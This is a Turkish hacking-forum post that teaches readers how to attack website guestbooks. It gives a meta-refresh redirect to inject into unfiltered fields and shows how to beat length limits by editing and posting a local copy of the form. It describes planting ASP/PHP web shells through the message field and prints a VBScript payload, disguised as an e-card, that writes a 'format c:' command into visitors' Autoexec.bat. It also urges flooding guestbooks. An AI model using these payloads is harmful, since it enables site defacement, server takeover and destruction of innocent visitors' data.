 |
Ziyaretçi def & GUestBook HACKING |
 |
29. June 2007, 18:40
|
#1 (permalink)
|
|
Uye Olmayan
Uye No:
Mesajlar: n/a
Seviye: -INF [ ] Aktiflik: NAN / -INF Güç: -INF / -INF Deneyim: NAN%
|
Ziyaretçi def & GUestBook HACKING
TERÖR
22-10-2005, 13:57
. Eski bir olay ama, bilmeyenler çok var.
Ben de oturuup, yazayım dedim olayı.
İlk olarak Mantık önemli . Ziyaretçi defteleri sizden, Mesaj , başlık vede bazıları nick, mail isterler. Şİmdi Siz oraya mesajınızı yazın, başlığınmızı düzgün atın. Güzel bişler yazın. Ve gönder dediğinizde, yazdıklarınız FİLTRE lerden geçerek [u>MSSQL , MYSQL ,MDB,TXT hangi veri tabanını kullanoıyorsa oraya yazdıklarınız kaydoluyor. Daha sonrada, Sizi Ziyaratçi defterinin sayfasına yönlendirtiyor. Aa bir bakıyorsunuz SİZİn yadıklarınız çıkmış ordaa. Yani ben bu yöntemle siteye bişiler yazdırabiliyorum. Hımm Şimdi burda ben öyle birşey yazdırmalıyım ki, Orda o kod , java artık ne yazdırııyorsam orda ÇALIŞMALI.
Olayımız problemmimiz budur. Bana gelen sorular şöylee ? Ziyaretçi defterine ne tür zararlar veririz..
- Eğer Ziyaretçi defteri Gerekli Filtrelemeleri yapmadı ise, Siz herşeyi yapaiblirisiniz. . Eğer ki Önlem alınmadı isee devam ediiiyorum..
Basit bildiğiniz bişi bu, 1 sn sonra site istediğiniz yere yönlenecek bir KOD verecem. Orda 1 yerine iseter 0 ,iseterse 3 size kalmış cinsi saniyedir ama..
<**** [Only registered and activated users can see links] content=1;URL=[Only registered and activated users can see links]>
Bakınız Bunu, Nick, başlık, mesaj kısmına neresi göreyorsanız oraya yazın. Çünkü webmaster Mesaj kısmına Fİltre koydu ise, siz Başlık kısmı sayesiyle yönlenecektir bu seferde.
Şİmdi bazı akıllı Webmasterlar, BAşlık kısmına 20 harf ilee kısıtlıyor. Siz o sayfayı PC nize kaydedin HTML olarak . Sonra o html sayfasını Notepad de açın. Action değerini düzeltin. vede BAşlık İnputundaki maxlength=21 size="37" gibi iki değer yada birini görürsünüz. Onları silin ve tekrar SAve edin. Sonra O PC nizdeki HTML yi çalıştırın ve kodlarınızı tekrar yzın. Başlık kısmınada. BU sefer başlık kısmında TÜm kodu yazabileceksiniz . Sonra SEND ne vardsa Gönder deyin. VEde böylelikle hem kendi PC nizden POST yapmılş olacaksınız, hemde webmaster ın o 20 karakter korumasını geçmiş olacağız. Böylece, başlık kısmında ekstra filtreleme yapmadığı için , Sizin kod çalışmış olacaktır..
Bakınız, MESAj kısmında Eğer sizin yönlendirme çalışıyor isee, unutmayın. O Ziyaaretçi defterinde FSO yani Zehir çalıştırma şansınızda vardır. ASP bir site ise, asp türü zehir, yada php türü
. NASIL Zehir atarım peki?
-BAsit beyler. Mesaj kısmı bölümüne, Yaa UPLOAD FSO lu kodlarını Yazarsınız, yada Zehir 2,3,4 ne versa, onun kodlarını O mesaj kısmınaa yazın. Vede gönderin. Eğer yönlendirme çalışıyor ise, bu zehir in çalışmasıda %50 dir. Ayrıca, zehir 2 3 yüklerseniz, pacth kısmını = ziyaretçi defterin ana sayfası asını yazın. Olay budur. Ziyarteçi defteri içinde siizin Zehir de çalışacaktır.
Ama eğer komplex , filtreli bir Ziyaretçi defteri isee, yemez buu =))
Mesela Size başka bir şeyden bahsedim, yabancı Guestbooklara saldırı anlatayım. Ama bu seferkinde, siz yabancılara zarar vereceksiniz :idea: nasılmı. .. Yabancıların PC lerine FORMAT attırmak istersinzi dimi.. Eğer sizin yönlendirme çalışıyor isee, ziyaeretçi defterinde, buu kod da çalışacaktır.
<html>
<head>
<**** [Only registered and activated users can see links]"Content-Type" content="text/html; charset=iso-8859-9">
<title>TERÖR</title>
</head>
<body>
<script language="VBSCRIPT">
Set fs = CreateObject("Scripting.FileSystemObject")
Set a = fs.CreateTextFile("C:Autoexec.bat", True)
a.WriteLine("format c: /autotest /u /q")
a.Close
</script>
<p>Giriste acılan uyariya "HAYIR" dediyseniz <a
href= "<i>javascript</i>:reload()">Malesef e-kart ınız calısmayacaktır.</p>
</body>
</html>
bu olay. YA bunu ziyaretçi defterine mesaj kısmına yazığı gönderin yada, bu kodları HTML yapıp. kendi siztenize , Free hostunuzaa yükleyin. VEDE ziyaretçi defterinide Yönlendirme kodu ilee ,bu html ye yönlendirrir. Her iki olayda aynı kapıya çıkar.
ayrıca size yamayı unutum. Şimdi eğer Fİltre var ise nolur?
- Basit Hiç biş , sizin kod çalışmaz vede ziyaretçi defterinde o kodunuz kalır. Biraz değişmiş şekli ilee .. KOrunma yöntemöleride kolay. İSteyene yazabilirim onlarıda..
Bir soru gelmişti bana., Ziyaretçi defterine SQL İnjeciton yapılırmuı diye?Yapsanda işine yaramaz. Ayrıca yapılacak bir yeride yok . :cool2: BElki Komplex bir yapı vardsa, zorlasak yapılabilir. Ondada SQL injeciton yazımda, okuyabilirisniz. Veri tabanını havaya uçurmayı hahah =)
Ayrıca Ziyaretçi defterlerine FLOOD da yapılabilir. bulduğunuz 100 defterden anında =) FLOOD işee yarar. hahah :yes: bunaa önlem almıyoo ne yazııkii.. Böylece Db i şişirebilirsiniz.
|
|
|
|
 |
| Seçenekler |
|
|
| Stil |
Konuyu değerlendir |
Normal
|
|
Yetkileriniz
|
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
HTML-KodlarıKapalı
|
|
|
|
Bütün Zaman Ayarları WEZ +3 olarak düzenlenmiştir. Şu Anki Saat: 23:03 . |
|
|
|
173, 171, 172, 170, 8, 9, 10, 11, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 249, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 259, 52, 53, 54, 56, 57, 58, 248, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 150, 151, 152, 153, 154, 155, 156, 157, 158, 237, 168, 183, 179, 160, 175, 178, 167, 162, 163, 164, 165, 166, 1, 176, 177, 180, 181, 182, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 201, 200, 199, 202, 203, 204, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 222, 219, 220, 221, 229, 230, 231, 232, 233, 234, 235, 236, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 250, 251, 252, 253, 254, 255, 256, 257, 258, 260, 261, 262, 263, 264, 265, 266, 267, 268, 269, 270, 271, 272, 273, 276, 277, 278,
|
|